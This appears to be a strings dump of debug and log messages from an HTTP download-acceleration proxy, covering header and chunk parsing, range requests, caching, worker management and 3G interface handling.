[HttpParser::ValidateEndOfLine] ___Error: The previous end of line was %s, which is different from %c%c.
[HttpParser::ValidateEndOfLine] ___Error: Invalid end of line: %c%c.
[HttpParser::LastChunkReceivedCompletely] Temporary nChunkSize:%d
[HttpParser::LastChunkReceivedCompletely] Received all %d bytes.
[HttpParser::LastChunkReceivedCompletely] Missing %d/%d bytes.
HttpParser::Initialize
HttpParser::GetLine
[HttpParser::GetChunkSize] Missing %d/%d bytes.
[HttpParser::GetChunkSize] After Adding nBytesInBuffer. nChunkSize:%d
[HttpParser::GetChunkSize] Before Adding nBytesInBuffer. nChunkSize:%d
[HttpParser::GetChunkSize] Received all %d bytes of the current chunk.
[HttpParser::GetChunkSize] After Adding Trailer nChunkSize:%d
[HttpParser::GetChunkSize] Before Adding Trailer nChunkSize:%d
[HttpParser::GetChunkSize] After Adding nChunkSize:%d
[HttpParser::GetChunkSize] Before Adding nChunkSize:%d
[HttpParser::GetChunkSize] Next chunk details: (header:%d bytes, size:%d bytes).
[HttpParser::GetChunkSize] The buffer size is %d bytes.
[HttpParser::GetChunkDetails] The size of the chunks is %d bytes.
[HttpParser::GetChunkDetails] ___Error Unknown end of line.
[HttpParser::GetChunkDetails] Going to analyze: BufferSize(%d), HeaderSize(%d), ChunkBufferSize(%d).
[HttpParser::ParseLine] ___Error: The field separator was not found in the line %.600s
HttpParser::ParseLine
[HttpParser::operator =] Adding Cookie %s : %s
HttpParser::GetFieldDataString
HttpParser::GetFieldDataNumber
[HttpParser::SetFieldData] Adding Cookie %s : %s
[HttpParser::SetFieldData] %s : %s
HttpParser::SetFieldData
HttpParser::AddLineDetailsToMap
[HttpParser::IsDataAvailable] Undefined - %d data bytes
[HttpParser::IsDataAvailable] Response code has no body - no data
[HttpParser::IsDataAvailable] Request - %lld/%lld, Available: %d, Missing: %lld
[HttpParser::IsDataAvailable] Content Length - %lld/%lld, Available: %d, Missing: %lld
[HttpParser::IsDataAvailable] Chunks size - %d bytes
[HttpParser::IsDataAvailable] ___Error The Header is not complete yet...
[HttpParser::IsConnectionClose] The Connection field exists:%s
[HttpParser::IsConnectionClose] HTTP/1.1 - The Connection field does NOT exists - using Keep-Alive as default
[HttpParser::IsConnectionClose] HTTP/1.0 - The Connection field does NOT exists - using Close as default
[HttpParser::GetContentLength] Content-Length: %lld
[HttpParser::GetDataLengthFromRanges] Range fields does not exists
[HttpParser::GetDataLengthFromRanges] Total Data Length = %lld, StartOfRange = %lld, EndOfRange = %lld
[HttpParser::GetDataLengthFromRanges] End Position == 0
[HttpParser::GetDataLengthFromRanges] Filesize: %lld
[HttpParser::GetDataLengthFromRangesField] Range fields does not exists
[HttpParser::GetDataLengthFromRangesField] Total Data Length = %lld
[HttpParser::GetRangesFromHeaderField] Range fields does not exists
[HttpParser::GetRangesFromHeaderField] StartOfRange = %lld, EndOfRange = %lld
[HttpParser::GetRangesFromHeaderField] Filesize: %lld
[HttpParser::IsValid] ___Error --- NOT an HTTP request ---
HttpParser::SetFieldDataNumber
[HttpParser::AnalyzeFirstLine] ___Error The number of tokens in the line %.600s is not valid.There is not enough memory to allocate new buffers.
[HttpParser::AnalyzeFirstLine] ___Error Invalid HTTP Header: %.600s
HTTP/
HttpParser::AnalyzeFirstLine
[HttpParser::SetConnectionType] Adding - Connection: %s (%s)
[HttpParser::SetConnectionType] %s: %s (%s)
[HttpParser::UpdateDataEncodingType] Request - No Encoding.
[HttpParser::UpdateDataEncodingType] Request Post/Put - No Encoding.
[HttpParser::UpdateDataEncodingType] Request Connect - No Encoding.
[HttpParser::UpdateDataEncodingType] - No Encoding.
[HttpParser::UpdateDataEncodingType] - The data encoding type is chunked.
[HttpParser::ParseHeader] Complete - Header size: %d
HttpParser::ParseHeader
HttpParser::GetAllFieldDataStrings
[HttpHeader::BuildFirstLineInHeader] ___Error building the first line if the header. The header type is undefined.
[HttpProxyRemote::SetRangesInHeaderField] ___Error: The function SetFieldData failed.
[HttpHeader::GetRangesFromPathURI] StartOfRange: %lld, EndOfRange: %lld
[HttpHeader::GetRangesFromPathURI] The token %s was not found in the URI
[HttpHeader::GetRangesFromPathURI] ___Error: The field %s does not exist.
[HttpHeader::GetRangesFromURI] StartOfRange: %lld, EndOfRange: %lld
[HttpHeader::GetRangesFromURI] The token %s was not found in the URI
[HttpHeader::GetRangesFromURI] ___Error: The field %s does not exist.
[HttpHeader::GetDomainAndPortFromURI] Domain: %s, Port: %d
[HttpHeader::GetDomainAndPortFromURI] ___Error No URI empty
[HttpProxyRemote::SetRangesInPathURI] ___Error: The function SetFieldData field.
%s%lld
[HttpHeader::SetRangesInPathURI] ___Error: The field %s does not exist.
[HttpProxyRemote::SetRangesInURI] ___Error: The function SetFieldData field.
%s%lld-
%s%lld-%lld
[HttpHeader::SetRangesInURI] ___Error: The field %s does not exist.
[HttpProxyLocal::SocketWasConnected] FDM=%d (%d)
[HttpProxyLocal::SocketAcceptedConnection] FDM=%d (%d)
[HttpProxyLocal::SocketWasClosed] FDM=%d (%d)
[HttpProxyLocal::ErrorOnSocket] FDM=%d (%d)
[HttpProxyLocal::Stop] FDM=%d (%d)
[~HttpProxyLocal - %p] FDM=%d (%d).
C:\Temp\Socket%d.bin
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d - Worker is switching back to HEADER state
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d - *** Finished sending the Request data *** (wrote %lld data bytes).
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d ___Error writing the Data.
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d - %d bytes from the data written.
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d - The data size is %d/%d bytes.
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d ___Warning Worker has no data to send.
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d - Worker is in DATA state
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d - Worker has %d data bytes in the buffer to send
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d - Worker is switching to DATA state
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d - *** Finished sending the Request header ***.
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d - Wroker is switching to DATA state
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d ___Error writing the Header.
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d - %d bytes from the Header written.
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d ___Warning Worker was stopped (in HEADER state)
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d - The header size is %d/%d bytes.
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d ___Error The header is not valid - switch to PassThrough mode!
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d ___Warning The header is not complete
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d - Worker is in HEADER state
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d - NO PassThrough mode
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d - IN PassThrough mode
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d ___Error: JobInfo is NULL.
[HttpProxyLocal::WriteToRemote] FDM=%d (%d),Req:%d - Going to analyze %d bytes.
[HttpProxyLocal::SocketReadyToReadFrom] FDM=%d (%d): After writing %d bytes into upper level
[HttpProxyLocal::SocketReadyToReadFrom] FDM=%d (%d): Going to write the %d bytes into the upper level
[HttpProxyLocal::SocketReadyToReadFrom] FDM=%d (%d): Read %d bytes from socket %d
[HttpProxyLocal::SocketReadyToReadFrom] FDM=%d (%d): ___Error: Reading from socket %d
[HttpProxyLocal::SocketReadyToReadFrom] FDM=%d (%d): Reading from socket %d
[HttpProxyLocal::SocketReadyToReadFrom] FDM=%d (%d),Req:%d ___Error: the socket object is null.
[HttpProxyLocal - %p] FDM=%d (%d).
C:\Temp\Socket_%d_%lld_%d.bin
C:\Temp\Socket_%d.bin
[HttpProxyWorker::Stop] FDM=%d (%d),Req:%d - Worker was STOPPED.
[HttpProxyWorker::Stop] FDM=%d (%d),Req:%d - Setting the cache writer as finished.
[HttpProxyWorker::Stop] FDM=%d (%d) - The socket object was deleted.
[HttpProxyWorker::Stop] FDM=%d (%d) - Going to delete the socket object.
[HttpProxyWorker::Stop] FDM=%d (%d),Req:%d - Going to stop the worker.
[HttpProxyWorker::Stop] FDM=%d (%d)
[HttpProxyWorker::ErrorOnJob] FDM=%d (%d)
[HttpProxyWorker::Write] FDM=%d (%d),Req:%d - After writing %d/%d bytes to socket %d.
[HttpProxyWorker::Write] FDM=%d (%d),Req:%d - Before writing %d bytes to socket %d.
HttpProxyWorker::Write
[RtmpProxyWorker::Write] FDM=%d (%d),Req:%d ___Warning No bytes to write
[HttpProxyWorker::Write] FDM=%d (%d),Req:%d ___Error is not ready
[HttpProxyWorker::OnCloseEvent] FDM=%d (%d),Req:%d - Socket %d was closed.
[HttpProxyWorker::InitializeSocket] FDM=%d (%d),Req:%d ___Error initializing socket
[HttpProxyWorker::InitializeSocket] FDM=%d (%d),Req:%d *** socket %d was Initialized ***.
[HttpProxyWorker::InitializeSocket] FDM=%d (%d),Req:%d ___Error Binding to cellular interface - set to default interface
[HttpProxyWorker::InitializeSocket] FDM=%d (%d),Req:%d - Binded to Cellular Interface.
[HttpProxyWorker::InitializeSocket] FDM=%d (%d),Req:%d *** new socket ***
HttpProxyWorker::InitializeSocket
[HttpProxyWorker::Initialize] FDM=%d (%d): ___Error initializing the worker, Err: %d.
[HttpProxyWorker::Initialize] FDM=%d (%d) was initialized.
HttpProxyWorker::Initialize
[HttpProxyWorker::DumpBufferToLogFile] FDM=%d (%d),Req:%d
[~HttpProxyWorker - %p] FDM=%d (%d).
[HttpProxyWorker - %p] FDM=%d (%d).
[JobInfo::GetPositionField] ___Error: The field %d is not a position field.
[JobInfo::SetPositionField] ___Error: The field %d is not a position field.
[JobInfo::SetPositionField] Job:%d - RANGE_CONTENT_LENGTH - %lld
[JobInfo::SetPositionField] Job:%d - TIME_CURRENT_POSITION - %lld
[JobInfo::SetPositionField] Job:%d - TIME_END_POSITION - %lld
[JobInfo::SetPositionField] Job:%d - TIME_START_POSITION - %lld
[JobInfo::SetPositionField] Job:%d - RANGE_END_POSITION - %lld
[JobInfo::SetPositionField] Job:%d - RANGE_START_POSITION - %lld
[JobInfo::GetDownloadStartPosition] Job:%d - %lld
[JobInfo::GetCurrentTimePosition] Job:%d - %lld
[JobInfo::SetDataHeaderBytes] Job:%d has Data Header: %lld bytes to discard
[JobInfo::GetBooleanField] ___Error: The field %d is not a boolean field.
[JobInfo::SetBooleanField] ___Error - The field %d is not a boolean field.
[JobInfo::SetBooleanField] Job:%d - IS_CELLULAR_FLAG - (%d --> %d)
[JobInfo::SetBooleanField] Job:%d - RANGE_WAS_DISCARDED - (%d --> %d)
[JobInfo::SetBooleanField] Job:%d - RANGE_WAS_UPDATED - (%d --> %d)
[JobInfo::SetBooleanField] Job:%d - IS_TIME_ACCELERATION_FLAG - (%d --> %d)
[JobInfo::SetBooleanField] Job:%d - IS_ACTIVE_FLAG - (%d --> %d)
[JobInfo::SetBooleanField] Job:%d - IS_MASTER_FLAG - (%d --> %d)
[JobInfo::SetBooleanField] Job:%d - RANGE_DOWNLOAD - (%d --> %d)
[JobInfo::SetBooleanField] Job:%d - RANGE_WAS_SHORTEN - (%d --> %d)
[JobInfo::GetCounter] ___Error: The field %d is not a counter field.
[JobInfo::SetCounter] ___Error: The field %d is not a counter field.
[JobInfo::Reset] Job:%d
[JobInfo::GetBytesLeftToDownloaded] Job:%d - Has no more bytes to download. (state:%d)
[JobInfo::GetBytesLeftToDownloaded] Job:%d - Left %lld bytes
[JobInfo::GetTimeLeftToDownload] Job:%d - has no more time to download. (state:%d)
[JobInfo::GetTimeLeftToDownload] Job:%d - has no more time to download.
[JobInfo::SetDownloadInactivityTimeout] Job:%d (state:%d) - InactivityMaxSeconds = %d
[JobInfo::IsAlive] ___Error Job:%d - did not download for a lot of time!
[JobInfo::CanBeRecovered] Job:%d - %d/%d
[JobInfo::GetTimeToRecovery] Job:%d - Time since last recovery: %d > %d
[JobInfo::GetTimeToRecovery] Job:%d - Time till next recovery: %d < %d
[JobInfo::GetTimeToRecovery] Job:%d - No time between recoveries
[JobInfo::SetTimeBetweenRecoveries] Job:%d - Time between recoveries: %d
[JobInfo::SetValidationBytes] Job:%d - Bytes: %d
[JobInfo::SetValidationBytes] ___Warning Job:%d - not enough bytes: %d < %d
[JobInfo::ValidateConsistency] ___Error Job:%d - Not Downloading the same job's Data after Reconnect!
[JobInfo::ValidateConsistency] Job:%d - *** Match OK ***
[JobInfo::DecrementDataHeaderBytes] Job:%d decremented Data Header: %lld bytes and has more: %lld bytes to discard
[JobInfo::DecrementBytesToDiscard] Job:%d decremented %lld bytes and has more %lld bytes to discard
[JobInfo::SetState] Job:%d, State: %d, Force: %d
[JobInfo::ResetState] Job:%d
[JobInfo::IncrementCounter] ___Error: The field %d is not a counter field.
[JobInfo::UpdateJobState] Job:%d - wrote all the data to the client. (state:%d)
[JobInfo::UpdateJobState] Job:%d - has no more bytes to download. (state:%d)
[JobInfo::SetRange] Req:%d, Job:%d, %lld-%lld (%lld-%lld).
[JobInfo::UpdateRange] Req:%d, Job:%d, %lld-%lld (%lld-%lld).
[JobInfo::UpdateTimeRange] Req:%d, Job:%d, %lld-%lld (%lld-%lld).
[JobInfo::IncrementDataHeaderBytes] Job:%d incremented Date Header: %lld bytes and has more: %lld bytes to discard
[JobInfo::SetBytesToDiscard] Job:%d has %lld bytes to discard
[JobInfo::IncrementBytesToDiscard] Job:%d incremented %lld bytes and has more %lld bytes to discard
[JobInfo::ValidateContinuousness] ___Error Job:%d with Job:%d (Bytes: %d) - Continues jobs does not match!
[JobInfo::ValidateContinuousness] Job:%d with Job:%d (Bytes: %d) - *** Match OK ***
[JobInfo::ValidateContinuousness] ___Warning Job:%d - Next job has no validation bytes
[JobInfo::ValidateContinuousness] ___Warning Job:%d - No next job to compare
[JobInfo] Job:%d
[JobInfo] Job:%d (%lld-%lld).
[~JobInfo] Job:%d (%lld-%lld).
************ End: d:d:d::d
************ Start: d:d:d::d
[JobInfo::RegisterToChangeManaer] FDM=%d, Job:%d
[JobInfo::RegisterToChangeManaer] ___Error FDM=%d, Job:%d - RegisterOnChanges
pIHttpProxyServer
[FileDownloadMgr::CanBeStopped] FDM=%d - FDM can't be stopped. NumberOfActiveWorkers: %d, NumberOfActiveWorkers3G: %d
[FileDownloadMgr::CanBeStopped] FDM=%d - FDM can be stopped.
[FileDownloadMgr::CanBeStopped] FDM=%d - FDM can't be stopped. cmState is %d.
[FileDownloadMgr::StopDownload] FDM=%d, Stopping...
[FileDownloadMgr::StopDownload] FDM=%d - Allow to complete prefetching...
[FileDownloadMgr::StopDownload] FDM=%d
[FileDownloadMgr::CreateCacheWriter] FDM=%d ___Error creating Cache Writer.
[FileDownloadMgr::StopAcceleration] **** FDM=%d - Going to stop the acceleration ****.
[FileDownloadMgr::StopAcceleration] FDM=%d
[FileDownloadMgr::ReportOnDownloadComplete] FDM=%d --- After calling to OnStopAcceleration() ---.
[FileDownloadMgr::ReportOnDownloadComplete] FDM=%d --- Before calling to OnStopAcceleration() ---.
[FileDownloadMgr::ReportOnDownloadComplete] FDM=%d
[FileDownloadMgr::ReportOnDataEvent] FDM=%d --- After calling to OnData() ---.
[FileDownloadMgr::ReportOnDataEvent] FDM=%d --- Before calling to OnData() ---.
[FileDownloadMgr::ReportOnStopEvent] FDM=%d --- After calling to OnStop() ---.
[FileDownloadMgr::ReportOnStopEvent] FDM=%d --- Before calling to OnStop() ---.
[FileDownloadMgr::ReportOnStartBadAcceleration] FDM=%d --- After calling to OnStartBadAcceleration() ---.
[FileDownloadMgr::ReportOnStartBadAcceleration] FDM=%d --- Before calling to OnStartBadAcceleration() ---.
[FileDownloadMgr::ReportOnHDAcceleration] FDM=%d --- Already reported (SEEK) ---
[FileDownloadMgr::ReportOnHDAcceleration] FDM=%d --- After calling to OnStartBadAcceleration() ---.
[FileDownloadMgr::ReportOnHDAcceleration] FDM=%d --- Before calling to OnStartBadAcceleration() ---.
[FileDownloadMgr::ReportOnTrialExpiredAcceleration] FDM=%d --- After calling to ReportOnTrialExpiredAcceleration() ---.
[FileDownloadMgr::ReportOnTrialExpiredAcceleration] FDM=%d --- Before calling to ReportOnTrialExpiredAcceleration() ---.
[FileDownloadMgr::AbortAcceleration] FDM=%d
[FileDownloadMgr::IsDownloadComplete] FDM=%d *** Download Completed *** (%lld >= %lld)
[FileDownloadMgr::SetDownloadSize] FDM=%d - Download size: %lld (%lld), bForce: %d
[FileDownloadMgr::OnInterfaceUp] FDM=%d - *** Abort Acceleration ***
[FileDownloadMgr::OnInterfaceDown] FDM=%d - ip: %d, name: %s, 3G: %d
[FileDownloadMgr::OnRequestComplete] FDM=%d (%d),Req:%d ### Stopping the FDM - Master was closed without HTTP header
[FileDownloadMgr::OnRequestComplete] FDM=%d (%d),Req:%d - ### Master Remote Connection was closed
[FileDownloadMgr::OnRequestComplete] FDM=%d (%d),Req:%d - Master Remote completed
[FileDownloadMgr::OnRequestComplete] FDM=%d - NumberOfActiveWorkers: %d, NumberOfActiveConnections: %d (3G: %d)
[FileDownloadMgr::OnRequestComplete] FDM=%d (%d) - %d Requests are pending...
[FileDownloadMgr::OnRequestComplete] FDM=%d (%d),Req:%d - *** FINISHED *** (%d/%d)
[FileDownloadMgr::OnWorkerConnectionReady] FDM=%d (%d),Req:%d (3G: %d)
[FileDownloadMgr::ResumeCaching] FDM=%d - Resuming...
[FileDownloadMgr::ResumeCaching] FDM=%d
[FileDownloadMgr::RestartWorkerToRedirectDomain] FDM=%d (%d),Req:%d ___Error - ReStartCurrentJob to: %s
pHttpProxyRemote
[FileDownloadMgr::AddDomainToRedirectList] FDM=%d ___Error SetRedirectFilter
[FileDownloadMgr::AddDomainToRedirectList] FDM=%d ___Error IRedirectController invalid
[FileDownloadMgr::AddDomainToRedirectList] FDM=%d - Domain: %s, Port: %d
[FileDownloadMgr::GetWorkerDataHeaderBytesToDiscard] FDM=%d
[FileDownloadMgr::GetWorkerDataHeaderBytesToDiscard] FDM=%d ___Error - Range size == Master size
[FileDownloadMgr::GetWorkerDataHeaderBytesToDiscard] FDM=%d ___Error - pJobInfo == NULL
[FileDownloadMgr::GetWorkerDataHeaderBytesToDiscard] FDM=%d ___Error - m_n64MasterWorkerContentLength <= 0
[FileDownloadMgr::ReportOnStartAcceleration] FDM=%d --- After calling to OnStartAcceleration() ---.
[FileDownloadMgr::ReportOnStartAcceleration] FDM=%d --- Before calling to OnStartAcceleration() ---.
[FileDownloadMgr::NotifyOnStop] FDM=%d - Going to stop the Local peer (%d)
[FileDownloadMgr::NotifyOnStop] FDM=%d
[FileDownloadMgr::IsToCloseLocal] FDM=%d - ### Close the FDM ### (Transparent Mode)
[FileDownloadMgr::IsToCloseLocal] FDM=%d - Transparent Mode - Master was not closed - wait for new requests...
[FileDownloadMgr::IsToCloseLocal] FDM=%d - ### Close the FDM ### (Proxy Mode)
[FileDownloadMgr::IsToCloseLocal] FDM=%d - Proxy Mode - Do not close the Local Worker yet - wait for new requests...
[FileDownloadMgr::FindWorkerByJob] FDM=%d ___Error worker not found for job %d.
[FileDownloadMgr::GetCacheData] FDM=%d *** Create New Cache Data *** Url: %s
[FileDownloadMgr::GetCacheData] FDM=%d *** Use existing Cache Data CD:%d ***
[FileDownloadMgr::GetCacheData] FDM=%d - Download - no caching needed
[FileDownloadMgr::GetCacheData] FDM=%d ___Error invalid IHttpCacheManager
[FileDownloadMgr::GetCacheData] FDM=%d ___Error invalid url
[FileDownloadMgr::GetCacheData] FDM=%d
[FileDownloadMgr::UpdateWorkersRanges] FDM=%d ___Warning *** Master worker passed all ranges. ***
[FileDownloadMgr::UpdateWorkersRanges] **** FDM=%d - The end position of worker (%d) updated to %lld.
[FileDownloadMgr::UpdateWorkersRanges] FDM=%d ___Error: The function FindWorkerByJob failed.
[FileDownloadMgr::UpdateWorkersRanges] **** FDM=%d - There are %lld bytes left to discard.
[FileDownloadMgr::UpdateWorkersRanges] FDM=%d (Iter: %d), Range: %lld-%lld, Overlapped and Closed due to (job: %d)
[FileDownloadMgr::UpdateWorkersRanges] **** FDM=%d ___Error update worker (%d). Must discard %lld bytes.
[FileDownloadMgr::UpdateWorkersRanges] **** FDM=%d - All the workers must discard %lld bytes.
[FileDownloadMgr::UpdateWorkersRanges] **** FDM=%d - The end position of the first worker (%d) was updated to %lld.
[FileDownloadMgr::UpdateWorkersRanges] **** FDM=%d First worker end position: %lld
[FileDownloadMgr::UpdateWorkersRanges] **** FDM=%d - Worker (%d) downloaded %lld data bytes
[FileDownloadMgr::UpdateWorkersRanges] **** FDM=%d - Going update the workers ranges.
[FileDownloadMgr::AddRequestToQueue] FDM=%d - Req:%d was added. Pending requests: %d
[FileDownloadMgr::GetRequestFromQueue] FDM=%d - Req:%d was removed. Pending requests: %d
[FileDownloadMgr::GetRequestFromQueue] FDM=%d - No more pending requests.
[FileDownloadMgr::GetRequestFromQueue] FDM=%d
[FileDownloadMgr::ReturnRequestToQueue] FDM=%d - Req:%d was returned. Pending requests: %d
[FileDownloadMgr::ReturnRequestToQueue] FDM=%d
[FileDownloadMgr::AddWorkerToList] FDM=%d There are %d workers
[HttpFileDownloadMgr::FindMasterWorker] FDM=%d ___Warning Master Worker not found !
[FileDownloadMgr::GetMasterWorker] FDM=%d (%d) The Master worker status is %s.
[FileDownloadMgr::Reset] FDM=%d - Jobs: %d, Workers: %d
[FileDownloadMgr::ReportNoAccelerationReason] FDM=%d ,%s
WARNING: Master passed all workers
WARNING: HD Acceleration not supported
ERROR: Dailymotion seek not supported
WARNING: Server in non support range servers list
[FileDownloadMgr::UpdateTimeWorkersRange] FDM=%d (%d),Req:%d - (Job: %d), Range: %lld-%lld
[FileDownloadMgr::UpdateTimeWorkersRange] FDM=%d (%d),Req:%d - (Iter: %d), Range : %lld-%lld, Overlapped and closed due to (job: %d)
[FileDownloadMgr::UpdateTimeWorkersRange] FDM=%d (%d),Req:%d - (Iter: %d), Range: %lld-%lld
[FileDownloadMgr::UpdateTimeWorkersRange] FDM=%d (%d),Req:%d - (Iter: %d), Range: %lld-%lld, Overlapped: %lld
[FileDownloadMgr::UpdateTimeWorkersRange] FDM=%d (%d),Req:%d - (Iter: %d), Range: %lld-%lld, Discard: %lld
[FileDownloadMgr::HandleAcceleration] FDM=%d (%d),Req:%d - *** Start Acceleration *** (>%dKB, %dms)
[FileDownloadMgr::HandleAcceleration] FDM=%d (%d),Req:%d - *** Stopping Acceleration *** (delay)
[FileDownloadMgr::HandleAcceleration] FDM=%d (%d),Req:%d - *** Start Acceleration *** (delay)
[FileDownloadMgr::OnInterfaceUp] FDM=%d - *** Start 3G Acceleration ***
[FileDownloadMgr::OnInterfaceUp] FDM=%d - ip: %d, name: %s, 3G: %d
[ACCELINFO::OnDeserialize] ___Error get URL
[FileDownloadMgr::AddRequest] FDM=%d
[FileDownloadMgr::AddDataToRequest] FDM=%d ___Warning Not adding data to Request, continue accumulating...
[FileDownloadMgr::AddDataToRequest] FDM=%d - Wrote all %d bytes to Remote worker
[FileDownloadMgr::AddDataToRequest] FDM=%d, Req:%d - Appending %d (%d) bytes to Remote, that were left from Write to Remote worker
[FileDownloadMgr::AddDataToRequest] FDM=%d, Req:%d ___Error Appending %d bytes to Request
[FileDownloadMgr::AddDataToRequest] FDM=%d, Req:%d - Appending %d (%d) bytes to Remote, since request has already data
[FileDownloadMgr::AddDataToRequest] FDM=%d, Req:%d - Appending %d (%d) bytes to Queue
[FileDownloadMgr::CreateWorker] FDM=%d (%d) was created.
[FileDownloadMgr::CreateWorker] FDM=%d (%d) ___Error Initializing the worker.
[FileDownloadMgr::RemoveWorkerFromList] FDM=%d There are %d workers
[FileDownloadMgr::DeleteAllRemoteProxies] FDM=%d - All workers where deleted.
[FileDownloadMgr::DeleteAllRemoteProxies] FDM=%d: There are %d workers.
[FileDownloadMgr::DeleteAllRemoteProxies] FDM=%d: There are no workers.
[FileDownloadMgr::DeleteAllRemoteProxiesButMaster] FDM=%d: There are %d workers.
[FileDownloadMgr::DeleteAllRemoteProxiesButMaster] FDM=%d: There are no workers.
[FileDownloadMgr::SetThreadCommand] FDM=%d - Setting the command %s (%d commands are waiting)
[FileDownloadMgr::UpdateConsistencyFailureReason] FDM=%d
[FileDownloadMgr::GetThreadCommand] FDM=%d - Getting the command %s (%d commands are waiting)
************ URL: %.800s ************
************ End: d:d:d::d ************
************ Start: d:d:d::d ************
[FileDownloadMgr::ReportOnStopAcceleration] FDM=%d --- After calling to OnStopAcceleration() ---.
[FileDownloadMgr::ReportOnStopAcceleration] FDM=%d --- Before calling to OnStopAcceleration() ---.
[FileDownloadMgr::ReportOnStopAcceleration] FDM=%d
[FileDownloadMgr::ExecuteExitCommand] FDM=%d - All connections where closed.
[FileDownloadMgr::ExecuteExitCommand] FDM=%d - Closing all connections.
[FileDownloadMgr::ExecuteExitCommand] FDM=%d - All jobs in the cache manager where removed.
[FileDownloadMgr::ExecuteExitCommand] FDM=%d - Remove all jobs in the cache manager.
[FileDownloadMgr::ExecuteExitCommand] FDM=%d - The cache manager was stopped.
[FileDownloadMgr::ExecuteExitCommand] FDM=%d - Stopping the cache manager.
[FileDownloadMgr::ExecuteExitCommand] FDM=%d - All the workers where deleted.
[FileDownloadMgr::ExecuteExitCommand] FDM=%d - Deleting all the workers.
[FileDownloadMgr::ExecuteExitCommand] FDM=%d - Exit Command was set.
[FileDownloadMgr::ContinueWithoutAcceleration] FDM=%d - There are %d workers left (NumberOfActiveWorkers: %d, NumberOfActiveWorkers3G: %d)
[FileDownloadMgr::ContinueWithoutAcceleration] FDM=%d - There are %d workers (NumberOfActiveWorkers: %d, NumberOfActiveWorkers3G: %d)
[FileDownloadMgr::ContinueWithoutAcceleration] FDM=%d (Forward)
[FileDownloadMgr::ContinueWithoutAcceleration] FDM=%d, Job:%d (Reverse)
[FileDownloadMgr::ContinueWithoutAcceleration] FDM=%d
[FileDownloadMgr::OnWorkerConnectionClosed] FDM=%d (%d),Req:%d (3G: %d)
[FileDownloadMgr::OnWorkerConnectionEstablished] FDM=%d (%d),Req:%d (3G: %d)
[FileDownloadMgr::Stop] FDM=%d - All connections where closed.
[FileDownloadMgr::Stop] FDM=%d - Closing all connections.
[FileDownloadMgr::Stop] FDM=%d - All jobs in the cache manager where removed.
[FileDownloadMgr::Stop] FDM=%d - Remove all jobs in the cache manager.
[FileDownloadMgr::Stop] FDM=%d - The cache manager was reset.
[FileDownloadMgr::Stop] FDM=%d - Reset the cache manager.
[FileDownloadMgr::Stop] FDM=%d - All the workers where deleted.
[FileDownloadMgr::Stop] FDM=%d - Deleting all the workers.
[FileDownloadMgr::Stop] FDM=%d - The working thread was stopped.
[FileDownloadMgr::Stop] FDM=%d Wait for the working thread to exit...
[FileDownloadMgr::Stop] FDM=%d - Stopping the working thread.
[FileDownloadMgr::Stop] FDM=%d - FDM_State: %d
[FileDownloadMgr::OnError] FDM=%d ___Error NumberOfActiveWorkers: %d, NumberOfActiveWorkers3G: %d
[FileDownloadMgr::OnError] FDM=%d (%d),Req:%d ___Error NumberOfActiveWorkers: %d, NumberOfActiveWorkers3G: %d
[FileDownloadMgr::CreateJobInfo] FDM=%d ___Error creating a new Range job.
[FileDownloadMgr::CreateJobInfo] FDM=%d ___Error creating Acceleration Data.
[FileDownloadMgr::CreateJobInfo] FDM=%d ___Error setting the request in the job.
[FileDownloadMgr::CreateJobInfo] FDM=%d ___Error creating a new Time job.
[FileDownloadMgr::UpdateRequest] FDM=%d ___Error: The function SetBuffer failed.
[FileDownloadMgr::UpdateRequest] FDM=%d ___Error: The function BuildHeader failed.
[FileDownloadMgr::UpdateRequest] FDM=%d ___Error: The function SetFieldData failed.
[FileDownloadMgr::UpdateRequest] FDM=%d ___Error: The function ParseHeader failed.
[FileDownloadMgr::InitiateRangeDownload] FDM=%d (%d) %lld-%lld (size: %lld)
[FileDownloadMgr::InitiateRangeDownload] FDM=%d (%d), Job:%d - Range was shorten
[FileDownloadMgr::InitiateRangeDownload] FDM=%d (%d), Job:%d - Download via Cellular Interface
[FileDownloadMgr::InitiateRangeDownload] FDM=%d (%d) - Start Job with Original request
[FileDownloadMgr::InitiateRangeDownload] FDM=%d, ___Error - Create Worker.
[FileDownloadMgr::InitiateRangeDownload] FDM=%d, Range: %lld-%lld, 3G: %d
[FileDownloadMgr::RecoverFailedDownload] FDM=%d ___Error - Starting the job.
[FileDownloadMgr::RecoverFailedDownload] FDM=%d (%d) - Starting Req:%d.
[FileDownloadMgr::RecoverFailedDownload] FDM=%d ___Error - creating a Worker.
[FileDownloadMgr::RecoverFailedDownload] FDM=%d ___Error - Getting pICacheWorker.
[FileDownloadMgr::RecoverFailedDownload] FDM=%d, Job:%d *** Going to recover failed download - Range: %lld-%lld ***.
[FileDownloadMgr::RecoverFailedDownload] FDM=%d, ___Error: Job:%d - reached the maximum recoveries.
[FileDownloadMgr::RecoverFailedDownload] FDM=%d (%d) - Stopping worker !!!
[FileDownloadMgr::RecoverFailedDownload] FDM=%d --- No failed downloads to recover ---
[FileDownloadMgr::RecoverFailedDownload] FDM=%d
[FileDownloadMgr::HelpSlowWorker] FDM=%d ___Error - Acceleration support is not definitive yet
[FileDownloadMgr::HelpSlowWorker] FDM=%d, Job:%d - *** was assisted ***
[FileDownloadMgr::HelpSlowWorker] FDM=%d ___Error - InitiateRangeDownload
[FileDownloadMgr::HelpSlowWorker] FDM=%d ___Error - Shorting the slow job range
